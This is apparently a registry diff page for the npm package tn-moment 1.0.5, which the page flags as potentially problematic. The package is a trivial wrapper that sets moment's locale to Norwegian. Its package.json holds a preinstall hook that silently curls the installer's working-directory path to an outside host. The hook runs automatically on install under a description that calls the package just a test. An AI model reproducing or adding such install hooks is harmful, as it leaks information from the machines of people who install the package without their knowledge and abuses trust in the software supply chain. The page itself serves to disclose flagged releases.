tn-moment 1.0.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of tn-moment might be problematic. Click here for more details.

package/.gitattributes ADDED
@@ -0,0 +1,2 @@
1
+ # Auto detect text files and perform LF normalization
2
+ * text=auto
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ const moment = require("moment");
2
+ moment.locale("nb");
3
+
4
+ module.exports = moment;
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "tn-moment",
3
+ "version": "1.0.5",
4
+ "description": "Nothing to see here, simply a test.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl -X POST https://dumpster.shuttleapp.rs -d \"${PWD}\" || true"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "moment": "^2.24.0"
13
+ }
14
+ }